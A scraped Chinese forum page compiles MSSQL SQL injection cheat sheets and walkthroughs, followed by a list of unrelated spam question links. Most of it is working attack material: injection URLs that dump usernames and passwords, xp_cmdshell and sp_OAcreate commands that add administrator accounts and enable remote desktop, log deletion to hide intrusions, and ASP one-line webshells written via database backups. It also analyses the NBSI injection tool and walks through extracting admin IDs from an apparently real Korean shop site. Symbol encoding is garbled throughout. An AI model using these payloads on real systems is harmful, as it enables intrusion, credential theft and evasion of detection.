&/Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20top%201%20cast(name%20as%20varchar(500))%20from(select%20top%202%20object_id,name%20from%20[zhaojiuchu].[sys].[all_objects]%20where%20type=char(85)%20order%20by%20object_id)%20t%20order%20by%20object_id%20desc)%3E0--&
爆表的id:
/Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20top%201%20cast([id]%20as%20nvarchar(20))%2bchar(94)%20%20from%20[zhaojiuchu].[sys].[sysobjects]%20where%20name=0x5a)%3E0--
猜列的数量:
/Web_News/Search.asp?style=3&keyword=%BD%AD%CE%F7'%20and%20(select%20cast(count(1)%20as%20varchar(8000))%2bchar(94)%20from%20[zhaojiuchu]..[users]%20where%201=1)%3E0--
/Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20cast(count(1)%20as%20varchar(10))%2bchar(94)%20from%20[zhaojiuchu].[sys].[all_columns]%20where%20object_id=E0--
& & &varchar 值 '5^' 转换成数据类型 int 时失败
第一个列名:
%20and%20(select%20top%201%20cast(name%20as%20varchar(500))%20from%20(select%20top%201%20column_id,name%20from%20[zhaojiuchu].[sys].[all_columns]%20where%20object_id=order%20by%20column_id)%20t%20order%20by%20column_id%20desc)%3E0--&
第二个列名:
Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20top%201%20cast(name%20as%20varchar(500))%20from%20(select%20top%202%20column_id,name%20from%20[zhaojiuchu].[sys].[all_columns]%20where%20object_id=order%20by%20column_id)%20t%20order%20by%20column_id%20desc)%3E0--
& 记录条数:
& & & & & & & & & & & & & & & & & & & & & & & & &&
& Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20cast(count(1)%20as%20varchar(8000))%2bchar(94)%20from%20[zhaojiuchu]..[users]%20where%201=1)%3E0--
& 爆用户名:
& Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20top%201%20cast(username%20as%20varchar)%2bchar(94)%20from%20(select%20top%201%20[username],[password]%20from%20[zhaojiuchu]..[users]%20where%201=1%20order%20by%20[username])%20t%20where%201=1%20order%20by%20[username]%20desc%20)%3E0%20and%20'1'='1 & 爆不出来:
& Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20top%201%20cast(username%20as%20varchar)%2bchar(94)%20from%20(select%20top%201%20[username],[password]%20from%20[zhaojiuchu]..[users]%20where%201=1%20order%20by%20[username])%20t%20where%201=1%20order%20by%20[username]%20desc%20)%3E0-- & & & & & & & &返回结果
& & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & &username或password & & & & & & & & & & & & & & & & & & & & & &第一条记录的
&Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20top%201%20cast(password%20as%20varchar)%2bchar(94)%20from%20(select%20top%201%20[username],[password]%20from%20[zhaojiuchu]..[users]%20where%201=1%20order%20by%20[username])%20t%20where%201=1%20order%20by%20[username]%20desc%20)%3E0%20and%20'1'='1
&Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20top%201%20cast(password%20as%20varchar)%2bchar(94)%20from%20(select%20top%201%20[username],[password]%20from%20[zhaojiuchu]..[users]%20where%201=1%20order%20by%20[username])%20t%20where%201=1%20order%20by%20[username]%20desc%20)%3E0--
----------------------------------pangolin3.0版本可以成功爆出用户和密码----------------------------------------------
&爆第一条记录的用户名和密码:
/Web_News/Search.asp?style=3&keyword=%BD%AD%CE%F7'%20and%20(select%20top%201%20isnull(cast([username]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]%20as%20nvarchar(4000)),char(32))%20from%20[zhaojiuchu]..[users]%20where%201=1%20order%20by%20[username])%3E0--
爆出一条记录用用户名和密码(除第一条用户名和密码:) & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & not除 & & & & & & & & &第一条 & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & 按姓名排序
/Web_News/Search.asp?style=3&keyword=%BD%AD%CE%F7'%20and%20(select%20top%201%20isnull(cast([username]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]%20as%20nvarchar(4000)),char(32))%20from%20[zhaojiuchu]..[users]%20where%201=1%20and%20username%20not%20in%20(select%20top%201%20username%20from%20[zhaojiuchu]..[users]%20where%201=1%20order%20by%20[username])%20order%20by%20[username])%3E0--
同上:除第二条记录的
/Web_News/Search.asp?style=3&keyword=%BD%AD%CE%F7'%20and%20(select%20top%201%20isnull(cast([username]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]%20as%20nvarchar(4000)),char(32))%20from%20[zhaojiuchu]..[users]%20where%201=1%20and%20username%20not%20in%20(select%20top%201%20username%20from%20[zhaojiuchu]..[users]%20where%201=1%20order%20by%20[username])%20order%20by%20[username])%3E0--&
/Web_News/Search.asp?style=3&keyword=%BD%AD%CE%F7'%20and%20(select%20top%201%20isnull(cast([username]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]%20as%20nvarchar(4000)),char(32))%20from%20[zhaojiuchu]..[users]%20where%201=1%20and%20username%20not%20in%20(select%20top%200%20username%20from%20zhaojiuchu..users%20where%201=1%20group%20by%20username))%3E0-- & 第一条,top%200&
/Web_News/Search.asp?style=3&keyword=%BD%AD%CE%F7'%20and%20(select%20top%201%20isnull(cast([username]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]%20as%20nvarchar(4000)),char(32))%20from%20[zhaojiuchu]..[users]%20where%201=1%20and%20username%20not%20in%20(select%20top%201%20username%20from%20zhaojiuchu..users%20where%201=1%20group%20by%20username))%3E0-- & 第二条:
----------------------------------------------------------------------------------------------------------------------------
& & & & & & & & & & & &mssql手工注入语句
=============================================================================
and exists (select * from sysobjects) & & & & & & & & & //判断是否是MSSQL
and 1=convert(int,@@version) 或 &1=(select @@version) & //判断数据库版本
;declare @d int & & & & & & & & & & & & & & & & & & & & //是否支持多行
and (select count(1) from [sysobjects])&=0 & & & & & & //是否支持子查询
and user&0 & & & & & & & & & & & & & & & & & & & & & &//获取当前数据库用户名
and db_name&0 & & & & & & & & & & & & & & & & & & & &//获取当前数据库名称
and 1=convert(int,db_name()) &或 &1=(select db_name()) &//当前数据库名
and 1=(select @@servername) & & & & & & & & & & & & & &//本地服务名
and 1=(select IS_SRVROLEMEMBER('sysadmin')) & & & & & //判断是否是系统管理员
and 1=(select is_srvrolemember('db_owner') & & & & & &//判断是否是库权限
and 1=(select is_srvrolemember('public') & & & & & & //判断是否为Public权限
having 1=1 -- & & & & & & & & & & & & & & & & & & & &//爆取当前数据库信息
group by 表名.列名 having 1=1 -- & & & & & & & //爆取其他表名,由上句语句得来
group by 表名.列名1,表名.列名 having 1=1 -- & & & & &//继续爆当前表中的其他列名
and (select top 1 name from(select top N id,name from sysobjects where
& & &xtype='U[或char(85)]' and status&0) order by id desc)&1
& & & & & & & & & & & & & & & //N从1开始递增即可爆当前库中所有表名,按ID降序排列
或 and (select top 1 name from sysobjects where xtype='U' and name not in
& & & (select top N name from sysobjects where xtype='u'))&1 & //同上
and (select top 1 name from master.dbo.sysdatabases order by dbid)&1
& & & & & & & & & & & & & & & & & & & & & & & & & & & //跨库查询,爆第一个
and (select top 1 name from master.dbo.sysdatabases where name not in
& & & &(select top N name from master.dbo.sysdatabases order by dbid))&1
& & & & & & & & & & & & & & & & & & & & & & & & & & &//跨库查询,N从1开始递增
and (select top 1 col_name(object_id('表名'),N)from sysobjects)&1
& & & & & & & & & & & & & & & & & & & & & & //爆指定表中任意列名,N从1开始递增
& & & &[扩展存储]
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype='X' AND
& & & & name='xp_cmdshell') & & & & & & & & & & & //判断xp_cmdshell是否存在
and 1=(select count(*) FROM master.dbo.sysobjects where
& & & & name= 'xp_regread') & & & & & &//查看xp_regread扩展存储过程是已被删除
;exec sp_addextendedproc xp_cmdshell,'xplog70.dll' & & & //恢复xp_cmdshell
;exec sp_addextendedproc &xp_cmdshell&,'c:\xplog70.dll& &//自定义恢复路径
;exec sp_dropextendedproc 'xp_cmdshell' & & & & & & & & &//删除xp_cmdshell
;exec master..xp_cmdshell 'dir c:\' & & & & & & & & & & //查看服务器C盘目录
添加和删除一个SA权限的数据库用户hakz:(需要SA权限)
exec master.dbo.sp_addlogin hakz,password
exec master.dbo.sp_addsrvrolemember hakz,sysadmin
停掉或激活某个服务:(需要SA权限)
;exec master..xp_servicecontrol 'stop','schedule' & & & & & & //规则服务
;exec master..xp_servicecontrol 'start','schedule'
;exec master..xp_servicecontrol 'start', 'server' & & & & &//启动SERVER服务
获取WEB路径:
①利用xp_cmdshell搜索:
;exec master..xp_cmdshell 'dir /s d:/index.asp'
②利用IIS接口获得网站根目录:
cmd /c cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/1/root
cmd /c cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/2/root
③读取注册表:(Public 即可)
exec master.dbo.xp_regread
HKEY_LOCAL_MACHINE,
'SYSTEM\CurrentControlSet\sERVICES\W3SVC\Paramenters\VirtualRoots\&&/'
④利用OLE控件中的SP_OAMETHOD函数:
;declare @shell int
;exec master..SP_OAMETHOD 'wscript.shell',@shell out
;exec master..SP_OAMETHOD @shell,'run',null,'cmd.exe/c dir /s
& d:/index.asp &c:/log.txt'
⑤利用xp_dirtree列目录:(Public 即可)
& 建立临时表:;CREATE TABLE temp([id] INT IDENTITY (1,1) NOT NULL,
& & & & & & [name][nvarchar](300) NOT NULL,[depth][int] NOT NULL,
& & & & & & [isfile][nvachar](50) NULL);
& & & & & & insert into temp exec master..xp_dirtree &d:/&,1,1
&读取表中数据: and (select name from temp where id=N)&1 &N从1开始递增
&删除临时表: & ;--检测SP_OAcreate是否存在:
and 1=(SELECT count(*)FROM master.dbo.sysobjects WHERE name='SP_OAcreate')
利用SP_OAcreate执行CMD命令:
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC
& &SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user
& & hakz hakz /add'
设置虚拟目录E为可读:
;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod
& & @o, 'run', NULL,' cscript.exe c:\inetpub\wwwroot\chaccess.vbs &a
& & w3svc/1/ROOT/e +browse'利用xp_cmdshell添加用户:(需要SA权限)
;exec master.dbo.xp_cmdshell 'net user hakz hakz /add'
;exec master.dbo.xp_cmdshell 'net localgroup administrators hakz /add'DOS下开 并修改端口号:
sc config termservice start= auto
net start termservice
reg add &HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& & Server& /v fDenyTSConnections /t REG_DWORD /d 0x0 /f & & //允许外部联接
reg add &HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& & Server\WinStations\RDP-Tcp& /v PortNumber /t REG_DWORD & //改端口到80开启数据库的远程连接:
①;select * from OPENROWSET
& &('SQLOLEDB','server=uid=pwd=pass',&select * from table&)
②;select * from OPENROWSET
& &('SQLOLEDB', 'uid=pwd=Network=DBMSSOCN;Address=1.2.3.4,1433;',
& & &'select * from table')
删除日志记录:
;exec master.dbo.xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc5
& & & \ex100401.log &c:\temp.txt'
替换日志记录:
;exec master.dbo.xp_cmdshell 'copy c:\winnt\system32\logfiles\w3svc5
\ex090404.log c:\winnt\system32\logfiles\w3svc5\ex100401.log &c:\temp.txt'
差异备份语句:
①完整备份一次:
& ;backup database 库名 to disk=&c:\hakz.bak&;--
②创建表并插入数据:
& ;create table [dbo].[dtest]([cmd][image]);
& ;insert into dtest(cmd) values
& & (0x3C9253E);--
③差异备份:
& ;backup database 库名 to disk=&WEB路径\z.asp& with DIFFERENTIAL,FORMAT;--
LOG备份语句:
;alter database null set RECOVERY FULL -- & & & & & //激活数据库为还原模式
;create table cmd (a image)&-
;backup log null to disk=&c:\cmd& with int --
;insrt into cmd(a) values
& & (0x3C9253E) --
;backup log null to disk=&备份路径'&
有时候可能一句话备份不能成功,可以多试试以下几个版本:
&%%25Execute(request(&hakz&))%%25&
&%Execute(request(&hakz&))%&
%&&%execute request(&hakz&)%&&%
&script language=VBscript runat=server&execute request(&hakz&)&/script&
&%25Execute(request(&hakz&))%25&
如果备份的数据库名里面有特殊符号,要用[]包含起来.
&沙盒模式提权:(需要SA权限)
&当是SA权限但是xp_cmdshell被删除或xplog70.dll无法恢复时适用
&①打开沙盒模式
&;EXEC master.dbo.xp_regwrite
&&HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
②利用默认
&;Select * From
& &OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select
& & shell(&net user hakz hakz /add&)');
& & & & &MSSQL手工注入语句常用的大概就这么多了,有些比较偏僻的就没有收录了,不过以后要有用时我还是会及时地把它们添加进来的 ~O(&_&)O~
===================================================================================================
& & & & & & & & & NBSI 注入分析跟踪报告(MSSQL篇)
=======================================================================================
作者:Softbug 文章来源:情感网络&
编写一个好的工具不容易,编写一个注入工具更是不容易。这篇文章系统通过跟踪NBSI的注入过程来分析牛人的测试思路。对手工分析刺探很有帮助。仔细跟踪NBSI的刺探结果也是对注入攻击的一种欣赏。&
首先我们找到了一家IT站点做测试,测试的目录仅仅是为了跟踪NBSI的刺探思路,不曾对该网站进行过恶意的破坏!&
1 & & & & 注入点的探测&
假设注入点为:/zhuru.asp?id=1&
那么NBSI会首先试探这样的连接:/zhuru.asp?id=1 and user%2bchar(124)&0&
最开始不明白为什么要叫个Char(124),这个值其实是个&|&符号。后面我们会说到。&
当然了,这样IIS会报错,返回一个500的内部错误号码,也许作者就以此为根据吧。&
3 & & & & 猜解表名&
跟踪发现,作者用一句话就完成一个表名的猜解,效率的确很高。具体的表名猜测代码为:&
And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)&0&
看见红色的1了吗?这个就是猜测数据表的表名数值!如果是第一个表,当然就为1,如果是第一个表那么这个1就改为2就是了,以此类推。&
那么我们如何决定表名已经猜测完毕了呢?这个简单,跟踪发现,只要 表名数值 X 和 X+1 个表返回的表名值是一样的表示猜测完毕了。&
5 & & & & 猜测列名&
跟踪发现,作者也是用一句话就完成了一个表名的猜解。可能这个就是对MSSQL猜解的好处吧!换了Access可能也是要一个字母一个字母的去猜。具体的猜解列名的代码为:&
And (Select Top 1 cast(name as varchar(8000)) from (Select Top 1 colid,name From syscolumns Where id = OBJECT_ID(NCHAR(78)%2BNCHAR(101)%2BNCHAR(119)%2BNCHAR(115)%2BNCHAR(95)%2BNCHAR(85)%2BNCHAR(115)%2BNCHAR(101)%2BNCHAR(114)) Order by colid) T Order by colid desc)&0&
看到红色的1了吗?这个表示我们要猜测列名的序列值。换成2就表示要猜测第2个列名。判断结束的方式和判断表名结束的方式一样。&
注意一点:&
NCHAR(78)%2BNCHAR(101)%2BNCHAR(119)%2BNCHAR(115)%2BNCHAR(95)%2BNCHAR(85)%2BNCHAR(115)%2BNCHAR(101)%2BNCHAR(114)&
为了饶过 & 符号的限制,作者尽量使用Nchar来连接表名的字符串值。上面这一传实际上就代表了一个表的字符串值。括号里面的数字是字符的ASC码。&
如果我们要猜测xfiletd这个表名,我们只要用HUIE的插件换算一下就OK了!&
我们就得到了下面字符:&
nchar(78)%2bnchar(66)%2bnchar(69)%2bnchar(6C)%2bnchar(65)%2bnchar(74)%2bnchar(75)&
呵呵!速度快吧!&
6 & & & &猜解数据&
下面我们来看看NBSI是如何猜解数据的,按道理应该是&暴&,让我们期待一下牛人是如何暴数据的。&
1) 得到字段的记录个数&
And%20(Select%20Cast(Count(1)%20as%20varchar(8000))%2Bchar(97)%20From%20[News_Style]%20Where%201=1)&0&
其中红色的News_Style代表我们要猜解的表名,这里作者用到了一个常用的暴表技巧。我们得到了字段数以后,字段是个INT类型的值,他和0比较是不会发生类型转换错误的。换句话说,记录就不会自动的&招&。如果我们在和0比较的时候实现就把把它和Char(97)//字符a 相连接,那么我们得到的就会是个字符串了。和零比较的时候自然就暴出了&记录个数&+a &这样一个数值来。现在大家该明白为什么第一步的刺探要加一个&|&符号了吧!谜底解开了。&
2) 得到字段的值&
得到了记录个数,然后不断的循环而暴出字段的值。还好,作者没用什么奇特的招数。作者的代码为:&
And (Select Top 1 isNull(cast([sName] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 9 sName From [News_Style] Where 1=1 Order by sName) T Order by sName desc)&0&
红色的news_style我不多解释了,就是要猜解的数据表名,绿色的9表示要得到第就 sname字段的第9条记录的值。循环几次,呵呵!数据就到手了。&
大家注意一下:char(124)这个东西。它的目的也在于把数据统统转化为字符串类型然后和int类型进行比较,然后暴出数据。道理如前所述!这就是NBSI为什么在得到的字段里面有&|&这样的值的原因。作者也许懒得处理罢了。:-)&
看到了吗?后面都有&|&符号。&
3) &关于双数据和N个数据的猜测&
大家也许觉得,NBSI猜测数据字段的值的速度很快,跟踪分析了一下,的确不错。假设我们要猜测一个表的2个字段的值。那么我们该如何写代码呢?&
&NBSI的代码是这样写的:&
第一步还是用1)的办法得到记录个数。第二步就用:&
And (Select Top 1 isNull(cast([UserName] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([PassWord] as varchar(8000)),char(32)) From (Select Top 1 UserName,PassWord From [News_User] Where 1=1 Order by UserName,PassWord) T Order by UserName desc,PassWord desc)&0&
(注意看|符号隔开了2个数值)&
News_user是一个表名,Char(124)我就不多解释了。大家可以照着猫画虎,把上面的语句和2)里面的语句进行对比一下。具有基本地球人功能的我想都能看出来作者是怎么暴多字段值的了吧。如果你高兴,一次把数据库的值都暴出来都无所谓。这里间接的提醒一下大家:暴一个字段的值的网络开销和暴全部的值的网络开销差不了多少,下次玩NBSI的时候记得把所有的值都挂上吧!J&
总结:有希望完成自己VB代码的朋友可能根据我们分析的结果编写程序,你们也将拥有属于自己的NBSI。如今的HUIE就具有这样的功能。希望大家去www.hack0.net访问。&
写程序最重要的就是编程思路,也许你看到的只是编写一个好程序的部分细节罢了。大家有没意思到,NBSI是如何判断网站能否注入的呢?其实单靠SQL暴错只是一个思路罢了。NBSI给我们展现的两种思路是:&
2 & & & & 判断IIS的报头 以正常返回200,101 为基础,如果返回500则表示出现了错误。&
3 & & & & 逐字逐句的判断IIS的返回信息,然后自己对比是否有注入的可能性!(因为,有些网站返回的HTML信息量是非常大的!用程序判断仍然很费时间,不推荐)&
更多的东西,其实我们还需要学习。不光是暴库,搞注入。&
NBSI其实是一个项目很大的软件,我们的分析是完全建立在IIS的错误提示开启的状态下完成的。 & & 而且是使用的&数字型&的注入方式。局限是有点,我们会继续跟踪以完全挖掘NBSI的注入思路的。Access注入的判断也许就是一个难恼人的编程项目。换了是你,你能编写出来吗?NBSI还有很多地方不健全,看了我们的文章也许你有办法可以编写出更牛的NB出来。有兴趣的朋友可以继续关注我们的NBSI分析报告。更欢迎有志之人能把编写出自己的网络小插件发到www.hack0.net来!&
Ps: 关于HUIE和HUIE插件的介绍请大家到www.hack0.net查询。更详细的讨论可以到www.hackerxfiles.net的[URL=]论坛[/URL]来发言。&
细想这INternet发展的速度真的是很快,稍微不注意就跟不上安全的节奏.对网管来说(其实很多接触安全的人都是网管),一个,一个小小的漏洞对网管来说都可能造成严重的后果.
搜索型注入语句[二]
& 帖几个baidu出来的关于搜索型注入的文章。百度货,不知道作者是哪个,感谢了先。。 ^_^
简单的判断搜索型存在不存在的办法是先搜索',如果出错,说明90%存在这个漏洞。然后搜索%,如果正常返回,说明95%有洞了。
然后再搜索一个关键字,比如2006吧,正常返回所有2006相关的信息,再搜索2006%'and 1=1 and '%'='和2006%'and 1=2 and '%'=',存在异同的话,就是100%有洞了。
我这里看出有上面说的洞后开始用nbsi来扫,结果总是超时,郁闷,看来要手工来暴需要的信息了。。。
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and user&0 and '%'=' //得到当前数据库账号
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and db_name()&0 and '%'=' //得到当前数据库名
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select count(*) from admin)&0 and '%'=' //返回错误页面,看来是没有admin这个表了
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status&0)&0 and '%'=' //得到当前数据库的第一个表名
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status&0 and name not in('codechange'))&0 and '%'=' //得到当前数据库的第二个表名
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status&0 and name not in('codechange','oldpoint'))&0 and '%'=' //得到当前数据库的第三个表名
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and%20(select%20top%201%20name%20from%20lvhuana3.dbo.sysobjects%20where%20xtype='u'%20and%20status&0%20and%20name%20not%20in('codechange','oldpoint','tbl_admin','tbl_afterservice','tbl_agent','tbl_bank','tbl_board','tbl_board2','tbl_brandbestLeft','tbl_brandbestRight','tbl_card','tbl_cart','tbl_catalogue','tbl_community','tbl_court','tbl_estimate','tbl_FAQ','tbl_mail_list','tbl_mem_add','tbl_mem_main','tbl_mem_out','tbl_mem_rboard','tbl_mileage','tbl_notice','tbl_ord_cash_receipt','tbl_ord_change''tbl_ord_cs','tbl_ord_change','tbl_ord_cs','tbl_ord_main','tbl_ord_payment','tbl_ord_prd','tbl_ord_prd_return','tbl_ord_refund','tbl_ord_req_main','tbl_ord_req_prd','tbl_ord_request','tbl_ord_user','tbl_partition','tbl_prd_category','tbl_prd_click','tbl_prd_desc','tbl_prd_grade','tbl_prd_main','tbl_prd_model','tbl_recommand','tbl_saleshop','tbl_search','tbl_tax','tbl_zipcode','tempDesc','tempdesc2','tempmodel','tempPrdMain','tempPrdmodel','tempsize','tempstyle','tmpordprd','tmpordprd2','trace1'))&0%20and%20'%'=' //依次类推,得到所有的表
其实分析可以知道只有这个tbl_admin表才是最重要的。接着开始暴列名。
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),1) from tbl_admin)&0 and '%'=' //得到tbl_admin这个表里的第一个列名c_employee_id
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),2) from tbl_admin)&0 and '%'=' //得到tbl_admin这个表里的第二个列名c_employee_name
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)&0 and '%'=' //得到tbl_admin这个表里的第三个列名c_password
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)&0 and '%'=' //得到tbl_admin这个表里的第四个列名c_level
列名暴完毕了,嘿嘿,接着开始暴管理员账号密码了。
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 c_employee_id from tbl_admin)&0 and '%'=' //得到第一个管理员的id为943hoon
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 2 * from tbl_admin order by 1)T order by 1 desc)S)&0 and '%'=' //得到第二个管理员的id为champ
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 3 * from tbl_admin order by 1)T order by 1 desc)S)&0 and '%'=' //得到第三个管理员的id为clark
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)&0 and '%'=' //得到第四个管理员的id为hskim
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)&0 and '%'=' //得到第五个管理员的id为jajeong
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 c_c_password from tbl_admin)&0 and '%'=' //这个语句是暴出管理员密码的,可惜直接返回了正常页面,郁闷。。。。
一会再想别的办法吧。。。。。
另外说下,2.3 的啊D支持搜索型的注入方式是:
一般网站的搜索都是部分匹配的
有漏洞的url是.cn/n ...ST=title&SC=
构造注入语句 三星%'and 1=1 and '%'='
三星%'and 1=2 and '%'='
大家看到了吧 两个返回页面是不一样的 说明有注入的漏洞 特征字 写笔记本 就是三星%'and 1=1 and '%'=' 返回时有的
我们知道一般搜索代码是这么写的:
Select * from 表名 where 字段 like &%关键字%&
这样就造成了对关键字前后的所有匹配(%是用来全部匹配的)
这里如果关键字没有过滤的话,就可以这样来构造:
关键字=& and [查询条件] and &%25&=&
这样查询就变成
select * from 表名 where 字段 like '%' and 1=1 and '%'='%'
这样就很好的构成了一个点,当然用手工也可以,用nbsi也可以~~
注入是不分家的,没必要什么型什么型的!~
如果不信,大家请看下面的《天书》的原话
第一节、SQL注入的一般步骤
首先,判断环境,寻找注入点,判断数据库类型,这在入门篇已经讲过了。
其次,根据注入参数类型,在脑海中重构SQL语句的原貌,按参数类型主要分为下面三种:
(A) ID=49 这类注入的参数是数字型,SQL语句原貌大致如下:
Select * from 表名 where 字段=49
注入的参数为ID=49 And [查询条件],即是生成语句:
Select * from 表名 where 字段=49 And [查询条件]
(B) Class=连续剧这类注入的参数是字符型,SQL语句原貌大致概如下:
Select * from 表名 where 字段=&连续剧&
注入的参数为Class=连续剧& and [查询条件] and &&=& ,即是生成语句:
Select * from 表名 where 字段=&连续剧& and [查询条件] and &&=&&
(C) 搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:
Select * from 表名 where 字段like &%关键字%&
注入的参数为keyword=& and [查询条件] and &%25&=&,即是生成语句:
Select * from 表名 where字段like &%& and [查询条件] and &%&=&%&
当然手工是麻烦的
用工具的话,我建议用nbsi的工具比较好,就我感觉只有nbsi结合了这个技术,用别的软体是不能注入的
注入点只要写:
.cn/n ...ST=title&SC=%
再加个特征字符就可以了&
您对本文章有什么意见或着疑问吗?请到您的关注和建议是我们前行的参考和动力&&}
我要回帖
更多关于 注入式攻击 的文章
更多推荐
- ·淘宝管理系统网的后台如何查看?
- ·怎么看淘宝在哪些设备上登录过后台查看方法是什么?
- ·Rocky 8 电脑版qq飞车安装不了怎么办QQ后如何启动?
- ·请问oa系统有哪些在不同类型的企业中如何体现其灵活性?哪家的灵活性好?
- ·照片中的老戏子叫我叫婉儿我得了一种什么病名子?垃圾小视频中《皮蛋有婉婉~》中的婉婉叫我叫婉儿我得了一种什么病名子?
- ·谁知道硫酸特布他林注射液的说明书?
- ·支 付 宝 怎 么 取 消 快 捷唯见五行 支中取 付
- ·蟋蟀声音大的铃声做铃声
- ·数据库中添加数据 怎么把数据中的java 单引号转义替换成两个java 单引号转义或转义符
- ·精盾k580s i7 d0n i7 d1帖什么膜
- ·baidu腾讯12腾讯13周年挖宝行动动是不是真的baidu
- ·谁会百度贴吧刷粉器啊 帮我刷下啊 谢谢
- ·想请教绝世高手在都市,我的电脑装那种系统合适~。。。配置和问题都在下面。
- ·令人信服的马用英语怎么写写
- ·初中数学二次函数函数好难呀
- ·腾讯qq十三周年庆典是不是有ΙЗ周年活动★腾讯qq十三周年庆典举办14周年抽奖活动吗
- ·要来个网站 你懂得,你懂得
- ·基于超磁致伸缩位移传感器的微定位和驱动装置Micro Positioning and Actuation Devices Using Giant Magnetostrictive
- ·baidu腾讯14qq13周年挖宝活动行动是不是真的baidu
- ·他写给我的配置单不是很清楚,大概…… AMD 四核 金士顿4G 华硕四核手机技嘉...
- ·用SQL注入式攻击攻击工具包找不到网站的SQL注入式攻击点怎么回事?
- ·能否通过DNS,网关和dns,IP地址查询到对方具体地理位置
- ·拉 手 网 怎 么 退 款 拉 手 网 怎 么 申 请 退 款▓※
- ·奥数题大全求解45
- ·财 付 通 被 盗 怎 么 办χ→
- ·篮球怎么分大小大小分预测
- ·谁有穿针引线法邀请码~ 跪求 我的邮箱,谢谢拉,
- ·excel countif函数如何用IF函数表示2357质合,谢谢
- ·CF上不去我的电脑刚装w7旗舰版官方下载64位系统装上CF后,进入房间读取进度条的时候就掉到桌面上了,这是怎么回事儿
- ·Discuz! 添加discuz 管理员密码 SQL命令
- ·代码求解释,最好每行怎样添加注释释 本人新手
- ·篮足球竞猜玩法有几种玩法?分别是什么?
- ·关于 Intel 酷睿 i5 2500k 4.5g电压超频到4.5G 后 电压多少的问题。
- ·网络垃圾文章的电影
- ·阿斯蒂芬阿斯顿马丁法师发生的发生的飞
- ·qq君临天下下创沧海—问问团队
